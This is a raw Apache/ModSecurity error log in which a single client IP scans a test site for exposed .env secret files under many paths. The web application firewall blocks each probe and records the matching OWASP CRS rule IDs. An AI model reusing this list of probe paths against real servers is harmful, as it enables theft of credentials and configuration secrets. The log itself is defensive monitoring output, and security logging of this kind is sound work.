[Thu Feb 26 02:06:49.579902 2026] [:error] [pid 2332242] [client 195.178.110.33:35570] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aZ-cqaw_J46bKuq0K9UHZAAAAAk"]
[Thu Feb 26 02:06:49.700409 2026] [:error] [pid 2332242] [client 195.178.110.33:35570] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZ-cqaw_J46bKuq0K9UHZgAAAAk"]
[Thu Feb 26 02:06:49.700629 2026] [:error] [pid 2332242] [client 195.178.110.33:35570] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZ-cqaw_J46bKuq0K9UHZgAAAAk"]
[Thu Feb 26 02:06:49.700842 2026] [:error] [pid 2332242] [client 195.178.110.33:35570] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aZ-cqaw_J46bKuq0K9UHZgAAAAk"]
[Thu Feb 26 02:06:49.895457 2026] [:error] [pid 2332242] [client 195.178.110.33:35570] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aZ-cqaw_J46bKuq0K9UHaQAAAAk"]
[Thu Feb 26 02:06:49.895690 2026] [:error] [pid 2332242] [client 195.178.110.33:35570] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aZ-cqaw_J46bKuq0K9UHaQAAAAk"]
[Thu Feb 26 02:06:49.895880 2026] [:error] [pid 2332242] [client 195.178.110.33:35570] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aZ-cqaw_J46bKuq0K9UHaQAAAAk"]
[Thu Feb 26 02:06:49.975274 2026] [:error] [pid 2332242] [client 195.178.110.33:35570] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aZ-cqaw_J46bKuq0K9UHagAAAAk"]
[Thu Feb 26 02:06:49.975505 2026] [:error] [pid 2332242] [client 195.178.110.33:35570] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aZ-cqaw_J46bKuq0K9UHagAAAAk"]
[Thu Feb 26 02:06:49.975688 2026] [:error] [pid 2332242] [client 195.178.110.33:35570] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aZ-cqaw_J46bKuq0K9UHagAAAAk"]
[Thu Feb 26 02:06:50.037635 2026] [:error] [pid 2332242] [client 195.178.110.33:35570] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aZ-cqqw_J46bKuq0K9UHawAAAAk"]
[Thu Feb 26 02:06:50.037850 2026] [:error] [pid 2332242] [client 195.178.110.33:35570] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aZ-cqqw_J46bKuq0K9UHawAAAAk"]
[Thu Feb 26 02:06:50.038032 2026] [:error] [pid 2332242] [client 195.178.110.33:35570] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aZ-cqqw_J46bKuq0K9UHawAAAAk"]
[Thu Feb 26 02:06:50.101738 2026] [authz_core:error] [pid 2332242] [client 195.178.110.33:35570] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Thu Feb 26 02:06:50.158797 2026] [authz_core:error] [pid 2332242] [client 195.178.110.33:35570] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Thu Feb 26 02:06:50.221194 2026] [:error] [pid 2332242] [client 195.178.110.33:35570] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aZ-cqqw_J46bKuq0K9UHbgAAAAk"]
[Thu Feb 26 02:06:50.221419 2026] [:error] [pid 2332242] [client 195.178.110.33:35570] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aZ-cqqw_J46bKuq0K9UHbgAAAAk"]
[Thu Feb 26 02:06:50.221592 2026] [:error] [pid 2332242] [client 195.178.110.33:35570] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aZ-cqqw_J46bKuq0K9UHbgAAAAk"]
[Thu Feb 26 02:06:50.480810 2026] [:error] [pid 2330788] [client 195.178.110.33:35580] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aZ-cqiSJSniLip0oFXi1qgAAAAA"]
[Thu Feb 26 02:06:50.481040 2026] [:error] [pid 2330788] [client 195.178.110.33:35580] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aZ-cqiSJSniLip0oFXi1qgAAAAA"]
[Thu Feb 26 02:06:50.481218 2026] [:error] [pid 2330788] [client 195.178.110.33:35580] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aZ-cqiSJSniLip0oFXi1qgAAAAA"]
[Thu Feb 26 02:06:50.567415 2026] [:error] [pid 2330788] [client 195.178.110.33:35580] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aZ-cqiSJSniLip0oFXi1qwAAAAA"]
[Thu Feb 26 02:06:50.567642 2026] [:error] [pid 2330788] [client 195.178.110.33:35580] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aZ-cqiSJSniLip0oFXi1qwAAAAA"]
[Thu Feb 26 02:06:50.567826 2026] [:error] [pid 2330788] [client 195.178.110.33:35580] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aZ-cqiSJSniLip0oFXi1qwAAAAA"]
[Thu Feb 26 02:06:53.017047 2026] [:error] [pid 2331624] [client 195.178.110.33:35594] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aZ-crc9iaYbHzIBMVEXXugAAAAc"]
[Thu Feb 26 02:06:53.017270 2026] [:error] [pid 2331624] [client 195.178.110.33:35594] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aZ-crc9iaYbHzIBMVEXXugAAAAc"]
[Thu Feb 26 02:06:53.017453 2026] [:error] [pid 2331624] [client 195.178.110.33:35594] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aZ-crc9iaYbHzIBMVEXXugAAAAc"]
[Thu Feb 26 02:07:00.964967 2026] [:error] [pid 2332243] [client 195.178.110.33:58220] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aZ-ctLSZ0-i57Co9sRVoXwAAAAo"]
[Thu Feb 26 02:07:00.965924 2026] [:error] [pid 2332243] [client 195.178.110.33:58220] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aZ-ctLSZ0-i57Co9sRVoXwAAAAo"]
[Thu Feb 26 02:07:00.966529 2026] [:error] [pid 2332243] [client 195.178.110.33:58220] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aZ-ctLSZ0-i57Co9sRVoXwAAAAo"]
[Thu Feb 26 02:07:02.961856 2026] [:error] [pid 2330791] [client 195.178.110.33:58222] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aZ-ctg3HqGC30X9HPoEn5wAAAAM"]
[Thu Feb 26 02:07:02.962098 2026] [:error] [pid 2330791] [client 195.178.110.33:58222] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aZ-ctg3HqGC30X9HPoEn5wAAAAM"]
[Thu Feb 26 02:07:02.962268 2026] [:error] [pid 2330791] [client 195.178.110.33:58222] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aZ-ctg3HqGC30X9HPoEn5wAAAAM"]
[Thu Feb 26 02:07:48.729387 2026] [:error] [pid 2330789] [client 195.178.110.33:51242] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /awstats/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aZ-c5DAL5Lg_nL66HcLlYQAAAAE"]
[Thu Feb 26 02:07:48.729600 2026] [:error] [pid 2330789] [client 195.178.110.33:51242] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aZ-c5DAL5Lg_nL66HcLlYQAAAAE"]
[Thu Feb 26 02:07:48.729754 2026] [:error] [pid 2330789] [client 195.178.110.33:51242] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aZ-c5DAL5Lg_nL66HcLlYQAAAAE"]
[Thu Feb 26 02:07:48.763626 2026] [:error] [pid 2330789] [client 195.178.110.33:51242] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /conf/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aZ-c5DAL5Lg_nL66HcLlYgAAAAE"]
[Thu Feb 26 02:07:48.763822 2026] [:error] [pid 2330789] [client 195.178.110.33:51242] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aZ-c5DAL5Lg_nL66HcLlYgAAAAE"]
[Thu Feb 26 02:07:48.763965 2026] [:error] [pid 2330789] [client 195.178.110.33:51242] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aZ-c5DAL5Lg_nL66HcLlYgAAAAE"]
[Thu Feb 26 02:07:48.799338 2026] [:error] [pid 2330789] [client 195.178.110.33:51242] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aZ-c5DAL5Lg_nL66HcLlYwAAAAE"]
[Thu Feb 26 02:07:48.799542 2026] [:error] [pid 2330789] [client 195.178.110.33:51242] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aZ-c5DAL5Lg_nL66HcLlYwAAAAE"]
[Thu Feb 26 02:07:48.799698 2026] [:error] [pid 2330789] [client 195.178.110.33:51242] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aZ-c5DAL5Lg_nL66HcLlYwAAAAE"]
